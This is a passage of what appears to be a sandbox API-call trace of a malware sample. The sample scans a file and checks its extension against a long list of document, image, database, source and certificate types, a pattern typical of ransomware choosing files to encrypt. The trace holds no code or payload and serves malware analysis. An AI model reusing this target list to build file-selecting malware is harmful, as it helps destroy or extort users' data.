ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.218] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.218] lstrlenW (lpString=".1cd") returned 4 [0286.218] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.218] lstrlenW (lpString=".3ds") returned 4 [0286.218] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.218] lstrlenW (lpString=".3fr") returned 4 [0286.218] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.218] lstrlenW (lpString=".3g2") returned 4 [0286.218] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.218] lstrlenW (lpString=".3gp") returned 4 [0286.218] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.218] lstrlenW (lpString=".7z") returned 3 [0286.218] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.218] lstrlenW (lpString=".accda") returned 6 [0286.218] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.218] lstrlenW (lpString=".accdb") returned 6 [0286.218] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.218] lstrlenW (lpString=".accdc") returned 6 [0286.218] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.218] lstrlenW (lpString=".accde") returned 6 [0286.218] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.218] lstrlenW (lpString=".accdt") returned 6 [0286.218] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.219] lstrlenW (lpString=".accdw") returned 6 [0286.219] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.219] lstrlenW (lpString=".adb") returned 4 [0286.219] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".adp") returned 4 [0286.219] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai") returned 3 [0286.219] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.219] lstrlenW (lpString=".ai3") returned 4 [0286.219] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai4") returned 4 [0286.219] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai5") returned 4 [0286.219] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai6") returned 4 [0286.219] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai7") returned 4 [0286.219] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".ai8") returned 4 [0286.219] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".anim") returned 5 [0286.219] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.219] lstrlenW (lpString=".arw") returned 4 [0286.219] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.219] lstrlenW (lpString=".as") returned 3 [0286.219] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.220] lstrlenW (lpString=".asa") returned 4 [0286.220] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".asc") returned 4 [0286.220] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".ascx") returned 5 [0286.220] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.220] lstrlenW (lpString=".asm") returned 4 [0286.220] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".asmx") returned 5 [0286.220] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.220] lstrlenW (lpString=".asp") returned 4 [0286.220] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".aspx") returned 5 [0286.220] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.220] lstrlenW (lpString=".asr") returned 4 [0286.220] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".asx") returned 4 [0286.220] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".avi") returned 4 [0286.220] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".avs") returned 4 [0286.220] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".backup") returned 7 [0286.220] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.220] lstrlenW (lpString=".bak") returned 4 [0286.220] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".bay") returned 4 [0286.220] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".bd") returned 3 [0286.220] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.220] lstrlenW (lpString=".bin") returned 4 [0286.220] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.220] lstrlenW (lpString=".bmp") returned 4 [0286.220] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".bz2") returned 4 [0286.221] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".c") returned 2 [0286.221] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.221] lstrlenW (lpString=".cdr") returned 4 [0286.221] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".cer") returned 4 [0286.221] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".cf") returned 3 [0286.221] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.221] lstrlenW (lpString=".cfc") returned 4 [0286.221] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".cfm") returned 4 [0286.221] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".cfml") returned 5 [0286.221] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.221] lstrlenW (lpString=".cfu") returned 4 [0286.221] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".chm") returned 4 [0286.221] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".cin") returned 4 [0286.221] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".class") returned 6 [0286.221] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.221] lstrlenW (lpString=".clx") returned 4 [0286.221] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.221] lstrlenW (lpString=".config") returned 7 [0286.221] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.221] lstrlenW (lpString=".cpp") returned 4 [0286.221] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".cr2") returned 4 [0286.222] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".crt") returned 4 [0286.222] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".crw") returned 4 [0286.222] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".cs") returned 3 [0286.222] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.222] lstrlenW (lpString=".css") returned 4 [0286.222] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".csv") returned 4 [0286.222] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".cub") returned 4 [0286.222] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dae") returned 4 [0286.222] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dat") returned 4 [0286.222] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".db") returned 3 [0286.222] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.222] lstrlenW (lpString=".dbf") returned 4 [0286.222] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dbx") returned 4 [0286.222] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dc3") returned 4 [0286.222] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dcm") returned 4 [0286.222] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.222] lstrlenW (lpString=".dcr") returned 4 [0286.223] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".der") returned 4 [0286.223] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".dib") returned 4 [0286.223] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".dic") returned 4 [0286.223] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".dif") returned 4 [0286.223] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".divx") returned 5 [0286.223] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".djvu") returned 5 [0286.223] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".dng") returned 4 [0286.223] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".doc") returned 4 [0286.223] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".docm") returned 5 [0286.223] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".docx") returned 5 [0286.223] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".dot") returned 4 [0286.223] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.223] lstrlenW (lpString=".dotm") returned 5 [0286.223] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".dotx") returned 5 [0286.223] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.223] lstrlenW (lpString=".dpx") returned 4 [0286.224] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dqy") returned 4 [0286.224] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dsn") returned 4 [0286.224] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dt") returned 3 [0286.224] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.224] lstrlenW (lpString=".dtd") returned 4 [0286.224] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dwg") returned 4 [0286.224] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dwt") returned 4 [0286.224] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".dx") returned 3 [0286.224] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.224] lstrlenW (lpString=".dxf") returned 4 [0286.224] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".edml") returned 5 [0286.224] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.224] lstrlenW (lpString=".efd") returned 4 [0286.224] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".elf") returned 4 [0286.224] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".emf") returned 4 [0286.224] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".emz") returned 4 [0286.224] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".epf") returned 4 [0286.224] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".eps") returned 4 [0286.224] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.224] lstrlenW (lpString=".epsf") returned 5 [0286.224] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.224] lstrlenW (lpString=".epsp") returned 5 [0286.225] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.225] lstrlenW (lpString=".erf") returned 4 [0286.225] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".exr") returned 4 [0286.225] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".f4v") returned 4 [0286.225] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".fido") returned 5 [0286.225] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.225] lstrlenW (lpString=".flm") returned 4 [0286.225] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".flv") returned 4 [0286.225] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".frm") returned 4 [0286.225] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".fxg") returned 4 [0286.225] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".geo") returned 4 [0286.225] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".gif") returned 4 [0286.225] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".grs") returned 4 [0286.225] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".gz") returned 3 [0286.225] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.225] lstrlenW (lpString=".h") returned 2 [0286.225] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.225] lstrlenW (lpString=".hdr") returned 4 [0286.225] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".hpp") returned 4 [0286.225] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.225] lstrlenW (lpString=".hta") returned 4 [0286.225] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".htc") returned 4 [0286.226] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".htm") returned 4 [0286.226] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".html") returned 5 [0286.226] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.226] lstrlenW (lpString=".icb") returned 4 [0286.226] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".ics") returned 4 [0286.226] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".iff") returned 4 [0286.226] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".inc") returned 4 [0286.226] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".indd") returned 5 [0286.226] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.226] lstrlenW (lpString=".ini") returned 4 [0286.226] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".iqy") returned 4 [0286.226] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".j2c") returned 4 [0286.226] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".j2k") returned 4 [0286.226] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".java") returned 5 [0286.226] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.226] lstrlenW (lpString=".jp2") returned 4 [0286.226] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".jpc") returned 4 [0286.226] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".jpe") returned 4 [0286.226] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.226] lstrlenW (lpString=".jpeg") returned 5 [0286.226] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.226] lstrlenW (lpString=".jpf") returned 4 [0286.226] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".jpg") returned 4 [0286.227] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".jpx") returned 4 [0286.227] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".js") returned 3 [0286.227] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.227] lstrlenW (lpString=".jsf") returned 4 [0286.227] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".json") returned 5 [0286.227] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.227] lstrlenW (lpString=".jsp") returned 4 [0286.227] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".kdc") returned 4 [0286.227] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".kmz") returned 4 [0286.227] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".kwm") returned 4 [0286.227] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".lasso") returned 6 [0286.227] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.227] lstrlenW (lpString=".lbi") returned 4 [0286.227] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".lgf") returned 4 [0286.227] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".lgp") returned 4 [0286.227] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".log") returned 4 [0286.227] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".m1v") returned 4 [0286.227] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".m4a") returned 4 [0286.227] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".m4v") returned 4 [0286.227] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.227] lstrlenW (lpString=".max") returned 4 [0286.228] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".md") returned 3 [0286.228] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.228] lstrlenW (lpString=".mda") returned 4 [0286.228] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mdb") returned 4 [0286.228] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mde") returned 4 [0286.228] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mdf") returned 4 [0286.228] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mdw") returned 4 [0286.228] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mef") returned 4 [0286.228] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mft") returned 4 [0286.228] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mfw") returned 4 [0286.228] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mht") returned 4 [0286.228] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mhtml") returned 6 [0286.228] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.228] lstrlenW (lpString=".mka") returned 4 [0286.228] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mkidx") returned 6 [0286.228] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.228] lstrlenW (lpString=".mkv") returned 4 [0286.228] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mos") returned 4 [0286.228] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.228] lstrlenW (lpString=".mov") returned 4 [0286.229] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mp3") returned 4 [0286.229] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mp4") returned 4 [0286.229] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mpeg") returned 5 [0286.229] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.229] lstrlenW (lpString=".mpg") returned 4 [0286.229] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mpv") returned 4 [0286.229] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mrw") returned 4 [0286.229] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".msg") returned 4 [0286.229] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.229] lstrlenW (lpString=".mxl") returned 4 [0286.229] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".myd") returned 4 [0286.229] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".myi") returned 4 [0286.229] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".nef") returned 4 [0286.229] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".nrw") returned 4 [0286.229] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".obj") returned 4 [0286.229] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".odb") returned 4 [0286.229] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".odc") returned 4 [0286.229] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".odm") returned 4 [0286.229] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.229] lstrlenW (lpString=".odp") returned 4 [0286.229] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".ods") returned 4 [0286.230] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".oft") returned 4 [0286.230] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".one") returned 4 [0286.230] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".onepkg") returned 7 [0286.230] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.230] lstrlenW (lpString=".onetoc2") returned 8 [0286.230] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.230] lstrlenW (lpString=".opt") returned 4 [0286.230] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".oqy") returned 4 [0286.230] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".orf") returned 4 [0286.230] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".p12") returned 4 [0286.230] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".p7b") returned 4 [0286.230] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".p7c") returned 4 [0286.230] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pam") returned 4 [0286.230] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pbm") returned 4 [0286.230] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pct") returned 4 [0286.230] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pcx") returned 4 [0286.230] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pdd") returned 4 [0286.230] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.230] lstrlenW (lpString=".pdf") returned 4 [0286.230] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pdp") returned 4 [0286.231] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pef") returned 4 [0286.231] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pem") returned 4 [0286.231] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pff") returned 4 [0286.231] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pfm") returned 4 [0286.231] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pfx") returned 4 [0286.231] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pgm") returned 4 [0286.231] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".php") returned 4 [0286.231] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".php3") returned 5 [0286.231] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.231] lstrlenW (lpString=".php4") returned 5 [0286.231] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.231] lstrlenW (lpString=".php5") returned 5 [0286.231] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.231] lstrlenW (lpString=".phtml") returned 6 [0286.231] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.231] lstrlenW (lpString=".pict") returned 5 [0286.231] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.231] lstrlenW (lpString=".pl") returned 3 [0286.231] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.231] lstrlenW (lpString=".pls") returned 4 [0286.231] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.231] lstrlenW (lpString=".pm") returned 3 [0286.231] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.231] lstrlenW (lpString=".png") returned 4 [0286.232] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".pnm") returned 4 [0286.232] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".pot") returned 4 [0286.232] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".potm") returned 5 [0286.232] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.232] lstrlenW (lpString=".potx") returned 5 [0286.232] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.232] lstrlenW (lpString=".ppa") returned 4 [0286.232] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".ppam") returned 5 [0286.232] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.232] 